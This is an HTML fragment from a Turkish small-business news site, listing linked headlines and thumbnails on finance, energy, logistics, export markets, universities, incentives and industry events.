<a href="http://www.kobi-efor.com.tr/finans/reel-sektore-surdurulebilir-kaynagin-adresi-finansal-kiralama-faktoring-ve-finansman-sirketleri-h6284.html" title="Reel sektöre sürdürülebilir kaynağın adresi: finansal kiralama, faktoring ve finansman şirketleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/reel_sektore_surdurulebilir_kaynagin_adresi_finansal_kiralama_faktoring_ve_finansman_sirketleri_h6284_8f6aa.jpg" alt="Reel sektöre sürdürülebilir kaynağın adresi: finansal kiralama, faktoring ve finansman şirketleri" />
<b>Reel sektöre sürdürülebilir kaynağın adresi: finansal kiralama, faktoring ve finansman şirketleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/ck-bogazici-elektrik-14-milyar-liralik-borcu-sildi-h6332.html" title="CK Boğaziçi Elektrik, 1.4 milyar liralık borcu sildi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ck_bogazici_elektrik_14_milyar_liralik_borcu_sildi_h6332_039f6.jpg" alt="CK Boğaziçi Elektrik, 1.4 milyar liralık borcu sildi" />
<b>CK Boğaziçi Elektrik, 1.4 milyar liralık borcu sildi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/gazdas-oguzeli-ilcesine-dogal-gaz-sunmaya-basladi-h6331.html" title="GAZDAŞ, Oğuzeli ilçesine doğal gaz sunmaya başladı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/gazdas_oguzeli_ilcesine_dogal_gaz_sunmaya_basladi_h6331_0d9f9.jpg" alt="GAZDAŞ, Oğuzeli ilçesine doğal gaz sunmaya başladı" />
<b>GAZDAŞ, Oğuzeli ilçesine doğal gaz sunmaya başladı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/lojistik/mng-kargo-ar-ge-merkezini-hayata-gecirdi-h6333.html" title="MNG Kargo Ar-Ge Merkezini hayata geçirdi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/mng_kargo_ar_ge_merkezini_hayata_gecirdi_h6333_792fb.jpg" alt="MNG Kargo Ar-Ge Merkezini hayata geçirdi" />
<b>MNG Kargo Ar-Ge Merkezi’ni hayata geçirdi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/ekol-turquality-programina-alinan-ilk-lojistik-firma-oldu-h6334.html" title="Ekol, Turquality programına alınan ilk lojistik firma oldu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekol_turquality_programina_alinan_ilk_lojistik_firma_oldu_h6334_46554.jpg" alt="Ekol, Turquality programına alınan ilk lojistik firma oldu" />
<b>Ekol, Turquality programına alınan ilk lojistik firma oldu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/enerji/enerjisa-dogancayda-portfoyunu-buyutuyor-h6318.html" title="Enerjisa, Doğançayda portföyünü büyütüyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/enerjisa_dogancayda_portfoyunu_buyutuyor_h6318_68a1f.jpg" alt="Enerjisa, Doğançayda portföyünü büyütüyor" />
<b>Enerjisa, Doğançay’da portföyünü büyütüyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/enerji/aktif-bank-ile-halk-enerji-ortak-sirket-kurdu-h6319.html" title="Aktif Bank ile Halk Enerji ortak şirket kurdu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/aktif_bank_ile_halk_enerji_ortak_sirket_kurdu_h6319_1ae2e.jpg" alt="Aktif Bank ile Halk Enerji ortak şirket kurdu" />
<b>Aktif Bank ile Halk Enerji ortak şirket kurdu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/borusan-lojistike-yeni-akilli-genel-merkez-h6320.html" title="Borusan Lojistike yeni ‘akıllı genel merkez"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/borusan_lojistike_yeni_akilli_genel_merkez_h6320_d01e0.jpg" alt="Borusan Lojistike yeni ‘akıllı genel merkez" />
<b>Borusan Lojistik’e yeni ‘akıllı’ genel merkez</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/lojistik/ups-yuk-tasimaciligi-icin-takip-teknolojisini-gelistiriyor-h6321.html" title="UPS, yük taşımacılığı için takip teknolojisini geliştiriyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ups_yuk_tasimaciligi_icin_takip_teknolojisini_gelistiriyor_h6321_c6980.jpg" alt="UPS, yük taşımacılığı için takip teknolojisini geliştiriyor" />
<b>UPS, yük taşımacılığı için takip teknolojisini geliştiriyor</b></a>
</div>
</div></div><div class="katelement kat_k5">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/kobilerimizin-disine-uygun-bir-pazar-ukrayna-h6313.html" title="KOBİlerimizin dişine uygun bir Pazar UKRAYNA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kobilerimizin_disine_uygun_bir_pazar_ukrayna_h6313_09432.jpg" alt="KOBİlerimizin dişine uygun bir Pazar UKRAYNA" />
<b>KOBİ’lerimizin dişine uygun bir Pazar UKRAYNA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/yukselen-buyuk-ekonomilerden-pakistan-h6206.html" title="Yükselen büyük ekonomilerden PAKİSTAN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/yukselen_buyuk_ekonomilerden_pakistan_h6206_c7461.jpg" alt="Yükselen büyük ekonomilerden PAKİSTAN" />
<b>Yükselen büyük ekonomilerden PAKİSTAN</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/mal-ve-isbirligi-talepleri/uluslararasi-ticaret-ve-isbirligi-teklifleri-h6263.html" title="Uluslararası Ticaret ve İşbirliği Teklifleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/uluslararasi_ticaret_ve_isbirligi_teklifleri_h6263_dd253.jpg" alt="Uluslararası Ticaret ve İşbirliği Teklifleri" />
<b>Uluslararası Ticaret ve İşbirliği Teklifleri</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyenin-dogu-afrikadaki-pazar-hedefleri-madagaskar-mozambik-tanzanya-h6133.html" title="Türkiyenin Doğu Afrikadaki pazar hedefleri: MADAGASKAR-MOZAMBİK-TANZANYA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_dogu_afrikadaki_pazar_hedefleri_madagaskar_mozambik_tanzanya_h6133_d6cc7.png" alt="Türkiyenin Doğu Afrikadaki pazar hedefleri: MADAGASKAR-MOZAMBİK-TANZANYA" />
<b>Türkiye’nin Doğu Afrika’daki pazar hedefleri: MADAGASKAR-MOZAMBİK-TANZANYA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/stratejik-pazarlama-ve-yatirim-raporu-dikkat-iran-h6026.html" title="Stratejik pazarlama ve yatırım raporu DİKKAT, İRAN!"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/stratejik_pazarlama_ve_yatirim_raporu_dikkat_iran_h6026_5a6eb.png" alt="Stratejik pazarlama ve yatırım raporu DİKKAT, İRAN!" />
<b>Stratejik pazarlama ve yatırım raporu DİKKAT, İRAN!</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/mal-ve-isbirligi-talepleri/uluslararasi-ticaret-ve-isbirligi-teklifleri-h6064.html" title="Uluslararası Ticaret ve İşbirliği Teklifleri"><img src="http://www.kobi-efor.com.tr/images/haberler/" alt="Uluslararası Ticaret ve İşbirliği Teklifleri" />
<b>Uluslararası Ticaret ve İşbirliği Teklifleri</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/pazarulke/en-buyuk-en-genis-en-derin-turkiyenin-10-ihracat-kapisi-h5984.html" title="En büyük, en geniş, en derin… Türkiyenin 10 ihracat kapısı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/en_buyuk_en_genis_en_derin_turkiyenin_10_ihracat_kapisi_h5984_3d13c.png" alt="En büyük, en geniş, en derin… Türkiyenin 10 ihracat kapısı" />
<b>En büyük, en geniş, en derin… Türkiye’nin 10 ihracat kapısı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/turkiyenin-vizyonuna-giren-pazar-hindistan-h5861.html" title="Türkiyenin vizyonuna giren pazar; HİNDİSTAN"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiyenin_vizyonuna_giren_pazar_hindistan_h5861_d1b2f.png" alt="Türkiyenin vizyonuna giren pazar; HİNDİSTAN" />
<b>Türkiye’nin vizyonuna giren pazar; HİNDİSTAN</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/pazarulke/dunyanin-en-hizli-buyuyen-kita-ekonomisi-gideni-buyuten-afrika-h5775.html" title="Dünyanın en hızlı büyüyen kıta ekonomisi, gideni büyüten AFRİKA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dunyanin_en_hizli_buyuyen_kita_ekonomisi_gideni_buyuten_afrika_h5775_90ad2.png" alt="Dünyanın en hızlı büyüyen kıta ekonomisi, gideni büyüten AFRİKA" />
<b>Dünyanın en hızlı büyüyen kıta ekonomisi, gideni büyüten AFRİKA</b></a>
</div>
</div></div><div class="katelement kat_k44">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/universite/ticaretin-130-yillik-tecrubesinin-egitime-aktigi-noktaistanbul-ticaret-universitesi-h6314.html" title="Ticaretin 130 yıllık tecrübesinin eğitime aktığı nokta:İstanbul Ticaret Üniversitesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ticaretin_130_yillik_tecrubesinin_egitime_aktigi_noktaistanbul_ticaret_universitesi_h6314_051db.jpg" alt="Ticaretin 130 yıllık tecrübesinin eğitime aktığı nokta:İstanbul Ticaret Üniversitesi" />
<b>Ticaretin 130 yıllık tecrübesinin eğitime aktığı nokta:İstanbul Ticaret Üniversitesi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/beykoz-universitesi-ogrencisine-is-deneyimi-kazandiriyor-h6335.html" title="Beykoz Üniversitesi, öğrencisine iş deneyimi kazandırıyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/beykoz_universitesi_ogrencisine_is_deneyimi_kazandiriyor_h6335_47e70.jpg" alt="Beykoz Üniversitesi, öğrencisine iş deneyimi kazandırıyor" />
<b>Beykoz Üniversitesi, öğrencisine iş deneyimi kazandırıyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/lila-kagittan-genclere-destek-h6336.html" title="Lila Kağıttan gençlere destek"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/lila_kagittan_genclere_destek_h6336_5e2a3.jpg" alt="Lila Kağıttan gençlere destek" />
<b>Lila Kağıt’tan gençlere destek</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/sigorta-cini-kocaeli-universitesi-ogrencileriyle-bulustu-h6322.html" title="Sigorta Cini, Kocaeli Üniversitesi öğrencileriyle buluştu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/sigorta_cini_kocaeli_universitesi_ogrencileriyle_bulustu_h6322_f2518.jpg" alt="Sigorta Cini, Kocaeli Üniversitesi öğrencileriyle buluştu" />
<b>Sigorta Cini, Kocaeli Üniversitesi öğrencileriyle buluştu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/supsan-itu-isbirligiyle-motor-test-merkezi-kurdu-h6323.html" title="Supsan İTÜ işbirliğiyle Motor Test Merkezi kurdu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/supsan_itu_isbirligiyle_motor_test_merkezi_kurdu_h6323_4ca3b.jpg" alt="Supsan İTÜ işbirliğiyle Motor Test Merkezi kurdu" />
<b>Supsan İTÜ işbirliğiyle Motor Test Merkezi kurdu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/universite/girisimciligin-merkezi-sabanci-universitesi-h6212.html" title="Girişimciliğin Merkezi Sabancı Üniversitesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/girisimciligin_merkezi_sabanci_universitesi_h6212_779ce.jpg" alt="Girişimciliğin Merkezi Sabancı Üniversitesi" />
<b>Girişimciliğin Merkezi Sabancı Üniversitesi</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/siemens-healthineers-inovatif-dusunceleri-gercege-donusturuyor-h6227.html" title="Siemens Healthineers, inovatif düşünceleri gerçeğe dönüştürüyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/siemens_healthineers_inovatif_dusunceleri_gercege_donusturuyor_h6227_1be21.jpg" alt="Siemens Healthineers, inovatif düşünceleri gerçeğe dönüştürüyor" />
<b>Siemens Healthineers, inovatif düşünceleri gerçeğe dönüştürüyor</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/arcelikten-perakende-akademisi-h6225.html" title="Arçelikten Perakende Akademisi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/arcelikten_perakende_akademisi_h6225_401c6.jpg" alt="Arçelikten Perakende Akademisi" />
<b>Arçelik’ten Perakende Akademisi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/egitimuniversite-sanayi/starturk-girisimcileri-bekliyor-h6226.html" title="Startürk girişimcileri bekliyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/starturk_girisimcileri_bekliyor_h6226_84008.jpg" alt="Startürk girişimcileri bekliyor" />
<b>Startürk girişimcileri bekliyor</b></a>
</div>
</div></div><div class="katelement kat_k45">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-ve-tesvik-programlari-h6310.html" title="Destek ve Teşvik programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_ve_tesvik_programlari_h6310_6d6bf.jpg" alt="Destek ve Teşvik programları" />
<b>Destek ve Teşvik programları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/haber-degerinde-hatirlatmalar-kamu-destegini-iskalama-h6198.html" title="Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/haber_degerinde_hatirlatmalar_kamu_destegini_iskalama_h6198_f94f8.jpg" alt="Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA" />
<b>Haber değerinde hatırlatmalar: KAMU DESTEĞİNİ ISKALAMA</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-tesvik-programlari-h6150.html" title="Destek-Teşvik Programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_tesvik_programlari_h6150_1ff81.png" alt="Destek-Teşvik Programları" />
<b>Destek-Teşvik Programları</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/ekonomi-bakanligi-proje-bazli-yatirim-destegi-h6048.html" title="Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ekonomi_bakanligi_proje_bazli_yatirim_destegi_h6048_12143.png" alt="Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği" />
<b>Ekonomi Bakanlığı Proje Bazlı Yatırım Desteği</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/abden-teknoloji-destekleri-h5935.html" title="ABden teknoloji destekleri"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/abden_teknoloji_destekleri_h5935_597e4.png" alt="ABden teknoloji destekleri" />
<b>AB’den teknoloji destekleri</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/destek-tesvik-programlari-h5753.html" title="Destek-Teşvik Programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/destek_tesvik_programlari_h5753_1d66b.png" alt="Destek-Teşvik Programları" />
<b>Destek-Teşvik Programları</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/calisma-hayatinda-sosyal-diyalogun-artirilmasi-h5657.html" title="Çalışma hayatında sosyal diyaloğun artırılması"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/calisma_hayatinda_sosyal_diyalogun_artirilmasi_h5657_8c1bb.png" alt="Çalışma hayatında sosyal diyaloğun artırılması" />
<b>Çalışma hayatında sosyal diyaloğun artırılması</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/surekli-basvuruya-acik-destek-programlari-h5595.html" title="Sürekli başvuruya açık destek programları"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/surekli_basvuruya_acik_destek_programlari_h5595_a9439.png" alt="Sürekli başvuruya açık destek programları" />
<b>Sürekli başvuruya açık destek programları</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/destek-tesvik/nitelige-destekler-h5509.html" title="NİTELİĞE DESTEKLER"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/nitelige_destekler_h5509_afef7.png" alt="NİTELİĞE DESTEKLER" />
<b>NİTELİĞE DESTEKLER</b></a>
</div>
</div></div><div class="katelement kat_k47">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/viko-by-panasonicten-yeni-linnera-serisi-h6338.html" title="VİKO by Panasonicten yeni Linnera serisi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/viko_by_panasonicten_yeni_linnera_serisi_h6338_c9575.jpg" alt="VİKO by Panasonicten yeni Linnera serisi" />
<b>VİKO by Panasonic’ten yeni Linnera serisi</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/surucusuz-araclarin-gelisimi-yuksek-cozunurluklu-kameralara-bagli-h6337.html" title="Sürücüsüz araçların gelişimi yüksek çözünürlüklü kameralara bağlı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/surucusuz_araclarin_gelisimi_yuksek_cozunurluklu_kameralara_bagli_h6337_ac5ad.jpg" alt="Sürücüsüz araçların gelişimi yüksek çözünürlüklü kameralara bağlı" />
<b>Sürücüsüz araçların gelişimi yüksek çözünürlüklü kameralara bağlı</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/saglik/takeda-turkiyede-buyumeye-onkoloji-alaninda-devam-ediyor-h6342.html" title="Takeda, Türkiyede büyümeye onkoloji alanında devam ediyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/takeda_turkiyede_buyumeye_onkoloji_alaninda_devam_ediyor_h6342_894a6.jpg" alt="Takeda, Türkiyede büyümeye onkoloji alanında devam ediyor" />
<b>Takeda, Türkiye’de büyümeye onkoloji alanında devam ediyor</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/saglik/avrupanin-2-beyin-hastanesi-turkiyede-h6341.html" title="Avrupanın 2. Beyin Hastanesi Türkiyede"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/avrupanin_2_beyin_hastanesi_turkiyede_h6341_4ad75.jpg" alt="Avrupanın 2. Beyin Hastanesi Türkiyede" />
<b>Avrupa’nın 2. Beyin Hastanesi Türkiye’de</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/saglik/kronik-agrilardan-noralterapi-ile-kurtulun-h6343.html" title="Kronik ağrılardan Nöralterapi” ile kurtulun"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kronik_agrilardan_noralterapi_ile_kurtulun_h6343_d3989.jpg" alt="Kronik ağrılardan Nöralterapi” ile kurtulun" />
<b>Kronik ağrılardan “Nöralterapi” ile kurtulun</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/siemens-home-connect-uygulamasi-ile-evi-uzaktan-kontrol-etmek-mumkun-h6324.html" title="Siemens Home Connect uygulaması ile evi uzaktan kontrol etmek mümkün"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/siemens_home_connect_uygulamasi_ile_evi_uzaktan_kontrol_etmek_mumkun_h6324_08c11.jpg" alt="Siemens Home Connect uygulaması ile evi uzaktan kontrol etmek mümkün" />
<b>Siemens Home Connect uygulaması ile evi uzaktan kontrol etmek mümkün</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/akilli-yasam/forddan-otomobili-evin-icine-tasiyan-yeni-akilli-besik-h6325.html" title="Forddan otomobili evin içine taşıyan yeni akıllı beşik"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/forddan_otomobili_evin_icine_tasiyan_yeni_akilli_besik_h6325_2cf00.jpg" alt="Forddan otomobili evin içine taşıyan yeni akıllı beşik" />
<b>Ford’dan otomobili evin içine taşıyan yeni akıllı beşik</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/siemens-turkiyeden-karbon-notr-hedefi-icin-5-bin-agaclik-orman-h6349.html" title="Siemens Türkiyeden ‘karbon nötr hedefi için 5 bin ağaçlık orman"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/siemens_turkiyeden_karbon_notr_hedefi_icin_5_bin_agaclik_orman_h6349_c327f.jpg" alt="Siemens Türkiyeden ‘karbon nötr hedefi için 5 bin ağaçlık orman" />
<b>Siemens Türkiye’den ‘karbon nötr hedefi’ için 5 bin ağaçlık orman</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/sosyal-sorumluluk/turktraktorden-filizlerin-mucizeleri-projesi-h6348.html" title="TürkTraktörden ‘Filizlerin Mucizeleri Projesi"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turktraktorden_filizlerin_mucizeleri_projesi_h6348_aca50.jpg" alt="TürkTraktörden ‘Filizlerin Mucizeleri Projesi" />
<b>TürkTraktör’den ‘Filizlerin Mucizeleri Projesi’</b></a>
</div>
</div></div><div class="katelement kat_k46">
<div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/nurdan-sonmez-cumhurbaskanlari-oturumu-bir-yol-ayriminda-olan-insanlik-h6287.html" title="Nurdan Sönmez: Cumhurbaşkanları Oturumu; Bir Yol Ayrımında Olan İnsanlık”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/nurdan_sonmez_cumhurbaskanlari_oturumu_bir_yol_ayriminda_olan_insanlik_h6287_df82f.jpg" alt="Nurdan Sönmez: Cumhurbaşkanları Oturumu; Bir Yol Ayrımında Olan İnsanlık”" />
<b>Nurdan Sönmez: Cumhurbaşkanları Oturumu; “Bir Yol Ayrımında Olan İnsanlık”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/xiii-kobi-zirvesi-25-mayis-ta-istanbul-da-endustriyel-donusumle-gelecegin-kobileri-h6273.html" title="XIII. KOBİ Zirvesi 25 Mayıs#039;ta İstanbul#039;da: Endüstriyel Dönüşümle Geleceğin KOBİleri”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/xiii_kobi_zirvesi_25_mayis_ta_istanbul_da_h6273_be0d0.jpg" alt="XIII. KOBİ Zirvesi 25 Mayıs#039;ta İstanbul#039;da: Endüstriyel Dönüşümle Geleceğin KOBİleri”" />
<b>XIII. KOBİ Zirvesi 25 Mayıs&#039;ta İstanbul&#039;da: “Endüstriyel Dönüşümle Geleceğin KOBİ’leri”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/osbuk-38-osb-temsilcisini-gebze-guzeller-osbde-bulusturdu-h6274.html" title="OSBÜK, 38 OSB temsilcisini Gebze Güzeller OSBde buluşturdu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/osbuk_osb_temsilcilerini_bulusturdu_h6274_7515c.jpg" alt="OSBÜK, 38 OSB temsilcisini Gebze Güzeller OSBde buluşturdu" />
<b>OSBÜK, 38 OSB temsilcisini Gebze Güzeller OSB’de buluşturdu</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/kocaelide-osb-baskanlari-ile-bir-araya-gelen-bakan-faruk-ozlu-ekonominin-lokomotifi-sanayi-sanayinin-lokomotifi-kocaeli-h6276.html" title="Kocaelide OSB Başkanları ile bir araya gelen Bakan Faruk Özlü; Ekonominin lokomotifi sanayi, sanayinin lokomotifi Kocaeli”"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/kocaelide_osb_baskanlari_ile_bir_araya_gelen_bakan_faruk_ozlu_ekonominin_lokomotifi_sanayi_sanayinin_lokomotifi_kocaeli_h6276_2de64.jpg" alt="Kocaelide OSB Başkanları ile bir araya gelen Bakan Faruk Özlü; Ekonominin lokomotifi sanayi, sanayinin lokomotifi Kocaeli”" />
<b>Kocaeli’de OSB Başkanları ile bir araya gelen Bakan Faruk Özlü; “Ekonominin lokomotifi sanayi, sanayinin lokomotifi Kocaeli”</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/tbd-genel-baskani-rahmi-aktepeye-gore-sektorun-hedefi-ar-ge-ve-inovasyon-esasli-uretim-kulturu-h6280.html" title="TBD Genel Başkanı Rahmi Aktepeye göre sektörün hedefi: Ar-Ge ve İnovasyon Esaslı Üretim Kültürü"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tbd_genel_baskani_rahmi_aktepe_ye_gore_sektorun_hedefi_ar_ge_ve_inovasyon_esasli_uretim_kulturu_h6280_0c1df.jpg" alt="TBD Genel Başkanı Rahmi Aktepeye göre sektörün hedefi: Ar-Ge ve İnovasyon Esaslı Üretim Kültürü" />
<b>TBD Genel Başkanı Rahmi Aktepe’ye göre sektörün hedefi: Ar-Ge ve İnovasyon Esaslı Üretim Kültürü</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/haber/tosyov-corluda-kobilere-ve-girisimcilere-finans-olanaklarini-anlatti-h6279.html" title="TOSYÖV, Çorluda KOBİlere ve girişimcilere finans olanaklarını anlattı"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/tosyov_corlu_da_kobi_lere_ve_girisimcilere_finans_olanaklarini_anlatti_h6279_3c5e6.jpg" alt="TOSYÖV, Çorluda KOBİlere ve girişimcilere finans olanaklarını anlattı" />
<b>TOSYÖV, Çorlu’da KOBİ’lere ve girişimcilere finans olanaklarını anlattı</b></a>
</div>
</div><div class="span4"><div>
<a href="http://www.kobi-efor.com.tr/haber/turkiye-den-valencia-ya-girisimcilik-koprusu-kuruldu-h6282.html" title="Türkiye#039;den Valencia#039;ya girişimcilik köprüsü kuruldu"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/turkiye_den_valencia_ya_girisimcilik_koprusu_kuruldu_h6282_87f66.jpg" alt="Türkiye#039;den Valencia#039;ya girişimcilik köprüsü kuruldu" />
<b>Türkiye&#039;den Valencia&#039;ya girişimcilik köprüsü kuruldu</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/firma-tanitim/ifs-farkli-uretim-metodlari-icin-erp-stratejilerini-anlatacak-h6277.html" title="IFS, farklı üretim metodları için ERP stratejilerini anlatacak"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/ifs_farkli_uretim_metodlari_icin_erp_stratejilerini_anlatacak_h6277_83c98.jpg" alt="IFS, farklı üretim metodları için ERP stratejilerini anlatacak" />
<b>IFS, farklı üretim metodları için ERP stratejilerini anlatacak</b></a>
</div>
<div>
<a href="http://www.kobi-efor.com.tr/firma-tanitim/dunyanin-en-buyuk-is-platformu-bni-hem-is-cevrenizi-hem-isinizi-buyutuyor-h6278.html" title="Dünyanın en büyük iş platformu BNI, hem iş çevrenizi hem işinizi büyütüyor"><img src="http://www.kobi-efor.com.tr/images/haberler/thumbs/dunyanin_en_buyuk_is_platformu_bni_hem_is_cevrenizi_hem_isinizi_buyutuyor_h6278_3a36d.jpg" alt="Dünyanın en büyük iş platformu BNI, hem iş çevrenizi hem işinizi büyütüyor" />
<b>Dünyanın en büyük iş platformu BNI, hem iş çevrenizi hem işinizi büyütüyor</b></a>
</div>
</div></div> 
          </div>
                      </div>
        </div>
<!-- MENU ***************************************************** -->
              <!-- UST MANSET -->
        <div id="ustmanset" class="span12">
          <div class="row-fluid">
          <ul class="thumbnails">
				
			<li class="span3"><a href="http://www.kobi-efor.com.tr/kapak/20-avrasya-ekonomi-zirvesi-istanbulda-yapildi-h6271.html" title="20. Avrasya Ekonomi Zirvesi, İstanbul’da yapıldı" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/avrasya-ekonomi-zirvesi-um.jpg" alt="20. Avrasya Ekonomi Zirvesi, İstanbul’da yapıldı"  />
			<div class="caption-line"><p>20. Avrasya Ekonomi Zirvesi</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/ayin-konugu/tesvikli-bingolden-cagri-var-potansiyel-var-yatirima-gel-h6272.html" title="Teşvikli Bingöl’den çağrı var; “Potansiyel var yatırıma gel”" class="thumbnail" >
			<img src="http://www.kobi-efor.com.tr/images/haberler/ustmanset/bingol-valisi-yavuz-selim-kosger-um.jpg" alt="Teşvikli Bingöl’den çağrı var; “Potansiyel var yatırıma gel”"  />
			<div class="caption-line"><p>Bingöl Valisi Yavuz Selim Köşger</p></div>						</a>
			</li>


		
			<li class="span3"><a href="http://www.kobi-efor.com.tr/haber/xiii-kobi-zirvesi-25-mayis-ta-istanbul-da-endustriyel-donusumle-gelecegin-kobileri-h6273.html" title="XIII. KOBİ Zirvesi 25 Mayıs&#039;ta İstanbul&#039;da: “Endüstriyel Dönüşümle Geleceğin KOBİ’leri”" class="thumbnail" >
